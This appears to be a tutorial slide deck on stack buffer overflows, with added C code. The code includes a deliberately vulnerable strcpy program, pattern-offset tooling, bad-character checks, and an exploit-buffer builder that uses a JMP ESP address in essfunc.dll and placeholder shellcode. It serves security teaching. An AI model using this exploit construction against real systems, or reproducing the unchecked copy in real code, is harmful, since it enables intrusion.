This document discusses conducting a buffer overflow attack against a vulnerable program. It describes the stack structure and how overflowing a buffer can overwrite the instruction pointer to redirect execution. Specifically, it shows finding the offset to overwrite the EIP, locating a "JMP ESP" instruction to redirect execution, adding shellcode, and dealing with bad characters. The final buffer structure pushes shellcode onto the stack and redirects to it to execute the attack. However, it notes these attacks should only be tested with explicit permission.
1. Exploiting buffer overflows
2. Disclaimer
@cyberkryption
The views expressed within this presentation or afterwards are my own and in no way represent my employer.
The following presentation describes how to conduct a buffer overflow attack.
These attacks are illegal to perform against systems that you do not have explicit permission to test.
I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations.
Caveat: With knowledge comes responsibility
7. Meet the Stack
Each program has its own stack, a region of memory that grows and shrinks as functions are called and return.
Program data such as local variables, saved registers and each function's return address are saved there.
Data is 'pushed' on to the stack and 'popped' off the stack (last in, first out).
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
8. A Vulnerable 'C' program
#include <stdio.h>
#include <string.h>   /* strcpy */

int main(int argc, char *argv[])
{
    char buff[20];                 /* 20 bytes reserved on the stack */
    printf("copying into buffer\n");
    strcpy(buff, argv[1]);         /* no length check: argv[1] can be any size */
    return 0;
}
We define a character array of 20 bytes, which reserves that much space in main's stack frame.
We copy argv[1] into it with strcpy, which copies until it meets a NUL byte and never checks the destination size.
If we pass more than the buffer size (20 bytes) the copy runs past the end of buff and we get a buffer overflow!
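For contrast, the same program with the unchecked strcpy replaced by a length check. This is an added example, not code from the slides; the names copy_arg and try_copy_of_length are mine, and BUFSZ mirrors the 20-byte buffer above.

```c
#include <stdio.h>
#include <string.h>

#define BUFSZ 20   /* same size as the slide's char buff[20] */

/* Hardened replacement for strcpy(buff, argv[1]): copy only if the source
 * and its terminating NUL fit. Returns 0 on success, -1 if src is too long. */
int copy_arg(char *dst, size_t dstsz, const char *src) {
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz)   /* n bytes of text plus 1 for the NUL must fit */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Helper (constructed for illustration): try to copy a run of n 'A' bytes into
 * a BUFSZ-byte stack buffer and report copy_arg's verdict. */
int try_copy_of_length(size_t n) {
    char src[128];
    char buff[BUFSZ];
    if (n >= sizeof src) return -1;
    memset(src, 'A', n);
    src[n] = '\0';
    return copy_arg(buff, sizeof buff, src);
}

/* Same shape as the vulnerable program, but oversized input is rejected. */
int main(int argc, char *argv[]) {
    char buff[BUFSZ];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    if (copy_arg(buff, sizeof buff, argv[1]) != 0) {
        fprintf(stderr, "rejected: %zu bytes, buffer holds at most %d\n",
                strlen(argv[1]), BUFSZ - 1);
        return 1;
    }
    printf("copied into buffer: %s\n", buff);
    return 0;
}
```

Note that strncpy is not a drop-in fix: when the source is too long it fills the destination without writing a terminating NUL, which turns the overflow into an over-read the next time the buffer is printed. An explicit length check keeps both properties.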
9. Stack Overwrite
Data on the stack is overwritten.
Extra input first overwrites the other data in the frame (neighbouring locals, then the saved EBP), then the saved return address.
When the function returns, that corrupted return address is loaded into the instruction pointer, so EIP is overwritten and we have control!
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
10. Meet the CPU Registers & Pointers
CPU Pointers
EIP = Instruction Pointer: the address of the next instruction to be executed.
ESP = Stack Pointer: the top of the stack.
EBP = Base Pointer: the base of the current stack frame.
If we can overwrite EIP we can control execution flow; otherwise all we have is a crash, i.e. a denial of service (DoS).
CPU Registers
EAX Accumulator
EBX Base Register
ECX Counter Register
EDX Data Register
15. Path to Victory
Determine Buffer Length.
Any Register pointing to buffer?
Locate EIP overwrite offset in buffer.
Enough space for shellcode?
Determine JMP ESP location?
Resolve any bad characters.
(Diagram: buffer = 'A' * 3000; ESP = ???; the layout of the buffer is still unknown at this stage.)
18. How to Locate EIP Overwrite
● Use Metasploit's pattern_create.rb to create a cyclic pattern of 3000 non-repeating characters and send it in place of the 'A's.
● After the crash, EIP holds the four pattern bytes that landed on the saved return address: 396F4338 in the slides' crash (x86 is little-endian, so those bytes sat in memory in the order "8Co9").
● Feed that value to pattern_offset.rb to find the EIP overwrite offset in the buffer.
● Use convert.sh for hex to ASCII conversion.
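The whole procedure from slides 9 and 18 in one runnable piece: a Metasploit-style pattern generator, the offset lookup, and a simulated stack frame (20-byte buff, saved EBP, return address) that plays the role of the vulnerable program so the overwrite can be observed without crashing anything. This is an added example, not code from the slides or from Metasploit; the frame values and the 3000-byte pattern are constructed, while the 396F4338 / 2006 pair is the deck's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATTERN_LEN 3000                /* same length the slides send */
#define BUFF_SZ     20                  /* char buff[20] in the vulnerable program */
#define FRAME_SZ    (BUFF_SZ + 4 + 4)   /* buff | saved EBP | return address */

/* Metasploit-style cyclic pattern (what pattern_create.rb emits): triples of
 * upper-case letter, lower-case letter, digit, so every 4-byte window is
 * unique within the first 20280 bytes. Returns the number of bytes written. */
size_t pattern_create(char *out, size_t len) {
    size_t n = 0;
    for (char u = 'A'; u <= 'Z'; u++)
        for (char l = 'a'; l <= 'z'; l++)
            for (char d = '0'; d <= '9'; d++) {
                if (n == len) return n; out[n++] = u;
                if (n == len) return n; out[n++] = l;
                if (n == len) return n; out[n++] = d;
            }
    return n;
}

/* What pattern_offset.rb does: the debugger shows EIP as a number, but x86 is
 * little-endian, so the bytes that sat in memory are that number's bytes in
 * reverse. Returns the offset of the first match in the pattern, or -1. */
long pattern_offset(const char *pat, size_t len, uint32_t eip) {
    unsigned char needle[4];
    for (int i = 0; i < 4; i++) needle[i] = (unsigned char)(eip >> (8 * i));
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

static uint32_t le32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Stand-in for the vulnerable main(): strcpy(buff, input) keeps writing past
 * buff, over the saved EBP and into the return address slot. Returns the value
 * RET would load into EIP. The frame contents are constructed sample values,
 * and the copy is clamped at the frame edge here; the real program keeps
 * writing over whatever lies above the frame until it faults. */
uint32_t simulate_overflow(const char *input) {
    unsigned char frame[FRAME_SZ] = {0};
    static const unsigned char saved_ebp[4] = {0xC8, 0xF8, 0xFF, 0xBF}; /* 0xBFFFF8C8 */
    static const unsigned char ret[4]       = {0xD2, 0x84, 0x04, 0x08}; /* 0x080484D2 */
    memcpy(frame + BUFF_SZ, saved_ebp, 4);
    memcpy(frame + BUFF_SZ + 4, ret, 4);

    size_t n = strlen(input);            /* strcpy: copy up to the NUL, no bounds check */
    memcpy(frame, input, n > FRAME_SZ ? FRAME_SZ : n);
    return le32(frame + BUFF_SZ + 4);    /* what now sits in the return address slot */
}

/* Ties the steps together on a 3000-byte pattern: crash, read EIP, look it up. */
uint32_t crash_eip_for_pattern(void) {
    char pat[PATTERN_LEN + 1];
    size_t n = pattern_create(pat, PATTERN_LEN);
    pat[n] = '\0';
    return simulate_overflow(pat);
}

long offset_in_pattern(uint32_t eip) {
    char pat[PATTERN_LEN];
    size_t n = pattern_create(pat, PATTERN_LEN);
    return pattern_offset(pat, n, eip);
}

int main(void) {
    uint32_t eip = crash_eip_for_pattern();
    printf("simulated frame: EIP = %08X, offset = %ld\n", eip, offset_in_pattern(eip));
    printf("slide value:     EIP = 396F4338, offset = %ld\n", offset_in_pattern(0x396F4338u));
    return 0;
}
```

For the simulated 28-byte frame the offset comes out at 24 (20 bytes of buff plus the 4-byte saved EBP), which is exactly why the slides need a pattern rather than counting by hand: on the real target the same lookup turns 396F4338 into 2006. A value that cannot be found in the pattern usually means EIP was copied out of the debugger with its bytes in the wrong order.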
24. Path to Victory
Determine Buffer Length.
Any Register pointing to buffer?
Locate EIP overwrite offset in buffer.
Enough space for shellcode?
Determine JMP ESP location?
Resolve any bad characters.
Buffer Construction (replacing the 'A' * 3000):
'A' * 2006 (padding up to the EIP overwrite) | 4 bytes EIP overwrite = 625011AF (JMP ESP in essfunc.dll) | 980 bytes shellcode
2006 + 4 + 980 = 2990 bytes, within the 3000 that crashed the program.
(Diagram: ESP = ???; the remaining field of the diagram is not recoverable from the page.)
25. The Bad Character Problem
Hex Dec Description
--- --- ---------------------------------------------
0x00 0 Null byte, terminates a C string
0x0A 10 Line feed, may terminate a command line
0x0D 13 Carriage return, may terminate a command line
0x20 32 Space, may terminate a command line argument
Bad characters break the exploit before the shellcode ever runs: the target, or the C library underneath it, treats them specially, so everything after them is dropped or altered on its way onto the stack. For example 0x00 terminates the strcpy, so nothing after the first null byte reaches the buffer!
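The two remaining steps, resolving bad characters and assembling the final buffer from slide 24, as an added example in C that is not part of the slides. The offset 2006, the JMP ESP address 625011AF in essfunc.dll and the four bad characters come from the deck; the 16-byte NOP sled, the buffer size and the two sample "shellcodes" (four INT3 breakpoints, and a copy with a NUL smuggled in) are constructed stand-ins for the 980-byte payload the slides send.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EIP_OFFSET   2006          /* padding needed to reach the saved return address */
#define JMP_ESP_ADDR 0x625011AFu   /* JMP ESP in essfunc.dll (from the slides) */
#define NOP_SLED     16            /* constructed: a little slack before the shellcode */

/* Bad characters from the table above; confirm per target with badchar_probe(). */
static const unsigned char BAD_CHARS[] = { 0x00, 0x0A, 0x0D, 0x20 };

/* Constructed stand-ins for msfvenom output: SAMPLE_SHELLCODE is four INT3
 * breakpoints (clean), BAD_SAMPLE carries a NUL at index 2. */
static const unsigned char SAMPLE_SHELLCODE[] = { 0xCC, 0xCC, 0xCC, 0xCC };
static const unsigned char BAD_SAMPLE[]      = { 0x90, 0x90, 0x00, 0xCC };

unsigned char exploit_buf[4096];

int is_bad_char(unsigned char c) {
    for (size_t i = 0; i < sizeof BAD_CHARS; i++)
        if (BAD_CHARS[i] == c) return 1;
    return 0;
}

/* Index of the first bad character in buf, or -1 if it is clean. */
long find_bad_char(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (is_bad_char(buf[i])) return (long)i;
    return -1;
}

/* Probe sent once the EIP offset is known: every byte 0x01..0xFF except the
 * ones already known to be bad. Compare the copy on the stack against this
 * array in the debugger; the first byte that is mangled or missing is the next
 * bad character, and the probe is regenerated without it. Returns bytes written. */
size_t badchar_probe(unsigned char *out, size_t cap) {
    size_t n = 0;
    for (int c = 0x01; c <= 0xFF && n < cap; c++)
        if (!is_bad_char((unsigned char)c)) out[n++] = (unsigned char)c;
    return n;
}

/* Final buffer: [ 'A' * EIP_OFFSET ][ JMP ESP address, little-endian ][ NOP sled ][ shellcode ].
 * After RET pops the address, ESP points at the byte right behind it, so JMP ESP
 * lands in the sled and slides into the shellcode. Returns the total length,
 * or -1 if the payload does not fit or the address/shellcode contain bad characters. */
long build_exploit(unsigned char *out, size_t cap, const unsigned char *sc, size_t sclen) {
    unsigned char addr[4];
    for (int i = 0; i < 4; i++) addr[i] = (unsigned char)(JMP_ESP_ADDR >> (8 * i));

    size_t total = EIP_OFFSET + 4 + NOP_SLED + sclen;
    if (total > cap) return -1;
    if (find_bad_char(addr, 4) >= 0 || find_bad_char(sc, sclen) >= 0) return -1;

    unsigned char *p = out;
    memset(p, 'A', EIP_OFFSET);   p += EIP_OFFSET;
    memcpy(p, addr, 4);           p += 4;
    memset(p, 0x90, NOP_SLED);    p += NOP_SLED;   /* 0x90 = NOP */
    memcpy(p, sc, sclen);
    return (long)total;
}

int main(void) {
    long n = build_exploit(exploit_buf, sizeof exploit_buf, SAMPLE_SHELLCODE, sizeof SAMPLE_SHELLCODE);
    printf("exploit buffer: %ld bytes; EIP bytes at %d: %02X %02X %02X %02X\n", n, EIP_OFFSET,
           exploit_buf[EIP_OFFSET], exploit_buf[EIP_OFFSET + 1],
           exploit_buf[EIP_OFFSET + 2], exploit_buf[EIP_OFFSET + 3]);
    printf("BAD_SAMPLE rejected: %ld (bad byte at index %ld)\n",
           build_exploit(exploit_buf, sizeof exploit_buf, BAD_SAMPLE, sizeof BAD_SAMPLE),
           find_bad_char(BAD_SAMPLE, sizeof BAD_SAMPLE));
    return 0;
}
```

The address check matters as much as the shellcode check: 625011AF encodes as AF 11 50 62, none of which is in the table, which is one reason that particular JMP ESP is usable. Real shellcode from msfvenom is generated with the confirmed bad characters excluded (the -b option) rather than patched afterwards.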